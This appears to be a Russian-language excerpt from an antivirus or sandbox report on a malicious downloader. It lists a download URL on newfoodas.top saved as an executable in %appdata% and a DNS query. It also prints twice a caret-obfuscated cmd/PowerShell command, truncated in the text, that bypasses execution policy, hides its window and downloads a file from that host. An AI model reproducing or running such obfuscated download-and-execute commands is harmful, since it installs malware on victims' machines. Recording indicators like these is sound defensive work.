Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^W^ERShelL.e^xE^ ^-EX^E^CUT^IONP^Olicy ^bYp^A^ss -No^PR^ofIL^E -^WIndoWS^t^YLE^ H^i^DD^en (^NEw-oB^j^EC^t sYSt^e^M^.nET.WEBC^L^IenT)^.DownLOAdFILe('http://newfoodas.top/read.ph...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "p^O^W^ERShelL.e^xE^ ^-EX^E^CUT^IONP^Olicy ^bYp^A^ss -No^PR^ofIL^E -^WIndoWS^t^YLE^ H^i^DD^en (^NEw-oB^j^EC^t sYSt^e^M^.nET.WEBC^L^IenT)^.DownLOAdFILe('http://newfoodas.top/read.ph...' (со скрытым окном)